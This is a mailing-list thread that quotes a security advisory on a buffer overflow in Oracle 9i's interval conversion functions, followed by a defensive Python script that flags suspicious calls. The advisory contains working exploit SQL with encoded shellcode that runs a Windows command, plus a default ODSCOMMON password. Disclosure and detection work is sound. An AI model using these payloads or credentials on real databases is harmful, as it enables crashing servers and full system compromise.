Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow

Hmmmm.....

Oracle 9.2.0.3 on Win2K, shut down the instance and the Oracle service.

Pretty serious bug to me.

mohammed

--- Jared.Still@xxxxxxxxxxx wrote:
> Has anyone here heard of this?
> 
> First I've seen it.  Could not get the exploit to work on 8i or 9i,
> haven't tried 10g.
> 
> It does however cause an ORA-3113.
> 
> Jared
> 
> =================================
> 
> The following security advisory is sent to the securiteam mailing list,
> and can be found at the SecuriTeam web site: http://www.securiteam.com
> - - - - - - - - -
> Oracle Database 9ir2 Interval Conversion Buffer Overflow
> Oracle Database Server is one of the most used database servers in the
> world; it was marketed as being unbreakable, and many people think that it
> is one of the most secure database servers on the market.
> 
> Oracle Database Server provides two functions that can be used with PL/SQL
> to convert numbers to date/time intervals; these functions have buffer
> overflow vulnerabilities.
> Vulnerable Systems:
>  * Oracle Database version 9ir2 and prior
> 
> When either of these conversion functions is called with a long string as
> the second parameter, a buffer overflow occurs.
> 
> To reproduce the overflow execute the next PL/SQL:
> SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;
> SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;
> 
> Any Oracle Database user can exploit this vulnerability because access to
> these functions can't be restricted. Exploitation of this vulnerability
> allows an attacker to execute arbitrary code; it can also be exploited to
> cause a DoS (denial of service) by killing the Oracle server process. An
> attacker can completely compromise the OS and database if Oracle is running
> on the Windows platform, because Oracle must run under the local System
> account or under an administrative account. If Oracle is running on *nix
> then only the database could be compromised, because Oracle mostly runs
> under the oracle user, which has restricted permissions.
> 
> Important: Exploitation of these vulnerabilities becomes easy if Oracle
> Internet Directory has been deployed, because Oracle Internet Directory
> creates a database user called ODSCOMMON that has a default password
> ODSCOMMON; this password cannot be changed, so any attacker can use this
> user to connect to the database and exploit these vulnerabilities.
> 
> Full tests on Oracle database 9ir2 under Microsoft Windows 2000 Server and
> Linux confirm these vulnerabilities. Versions running on other OS platforms
> are believed to be affected too. Previous Oracle Database Server versions
> could be affected by these vulnerabilities.
> 
> 
> Exploits:
> -- These exploits should work on Windows 2000 Server and Windows XP, not
> tested on Windows 2003.
> -- Run any command at the end of the string
> SELECT NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||
> chr(59) || chr(79) || chr(150) || chr(01) || chr(141) || chr(68) ||
> chr(36) || chr(18) || chr(80) || chr(255) || chr(21) || chr(52) || chr(35) ||
> chr(148) || chr(01) || chr(255) || chr(37) || chr(172) || chr(33) ||
> chr(148) || chr(01) || chr(32) || 'echo ARE YOU SURE? >c:\Unbreakable.txt')
> FROM DUAL;
> 
> SELECT NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' ||
> chr(59) || chr(79) || chr(150) || chr(01) || chr(141) || chr(68) ||
> chr(36) || chr(18) || chr(80) || chr(255) || chr(21) || chr(52) || chr(35) ||
> chr(148) || chr(01) || chr(255) || chr(37) || chr(172) || chr(33) ||
> chr(148) || chr(01) || chr(32) || 'echo ARE YOU SURE? >c:\Unbreakable.txt')
> FROM DUAL;
> 
> Vendor Fix:
> Go to the Oracle Metalink site, http://metalink.oracle.com.
> 
> Vendor Contact:
> Oracle was contacted and they released a fix without telling the public or
> Cesar anything and without issuing an alert.
> Additional Information:
> The information has been provided by Cesar.
> ================================================================================


----------------------------------------------------------------
Please see the official ORACLE-L FAQ: http://www.orafaq.com
----------------------------------------------------------------
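As an added example (not part of this thread or of the SecuriTeam advisory), here is a Python check a DBA could run over captured SQL text, for instance statements pulled from the audit trail, to flag calls to NUMTOYMINTERVAL/NUMTODSINTERVAL whose second argument is anything other than a plain literal naming one of the documented units. The two function names and their unit lists are Oracle's; the regex, the argument splitter and the sample statements are assumptions of this example.

```python
import re

# Unit names each conversion function legitimately accepts as its 2nd argument.
ALLOWED_UNITS = {
    "NUMTOYMINTERVAL": {"YEAR", "MONTH"},
    "NUMTODSINTERVAL": {"DAY", "HOUR", "MINUTE", "SECOND"},
}
_CALL_RE = re.compile(r"\b(NUMTOYMINTERVAL|NUMTODSINTERVAL)\s*\(", re.IGNORECASE)
_PLAIN_LITERAL_RE = re.compile(r"^'([^']*)'$")

def _call_args(sql, start):
    """Split the argument list beginning at sql[start] (just past the opening
    paren) on top-level commas, honouring nested parens and quoted strings."""
    parts, cur, depth, in_str = [], [], 0, False
    for ch in sql[start:]:
        if in_str:
            in_str = ch != "'"          # a quote closes the literal
        elif ch == "'":
            in_str = True
        elif ch == "(":
            depth += 1
        elif ch == ")":
            if depth == 0:
                break                   # end of this call's argument list
            depth -= 1
        elif ch == "," and depth == 0:
            parts.append("".join(cur).strip()); cur = []
            continue
        cur.append(ch)
    parts.append("".join(cur).strip())
    return parts

def find_suspicious_interval_calls(sql):
    """Return (function, reason) for every call whose unit argument is not a
    plain literal from ALLOWED_UNITS; concatenation, chr() or a very long
    literal are exactly the shapes the advisory's reproducer uses."""
    findings = []
    for m in _CALL_RE.finditer(sql):
        func = m.group(1).upper()
        args = _call_args(sql, m.end())
        if len(args) < 2:
            findings.append((func, "missing unit argument")); continue
        lit = _PLAIN_LITERAL_RE.match(args[1])
        if not lit:
            findings.append((func, "unit is not a plain string literal")); continue
        unit = lit.group(1)
        if unit.upper() not in ALLOWED_UNITS[func]:
            findings.append((func, f"unexpected unit literal of length {len(unit)}"))
    return findings

if __name__ == "__main__":
    # Constructed sample statements: one legitimate, one overlong literal,
    # one built by concatenation with chr() as in the advisory's exploit.
    for stmt in ("SELECT NUMTOYMINTERVAL(1,'MONTH') FROM dual",
                 "SELECT NUMTOYMINTERVAL(1,'" + "A" * 200 + "') FROM dual",
                 "SELECT NUMTODSINTERVAL(1,'AAAA' || chr(59) || 'x') FROM dual"):
        print(find_suspicious_interval_calls(stmt))
```

A unit passed through a bind variable or a column is also reported as "not a plain string literal", so review such hits rather than treating every finding as an attack.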
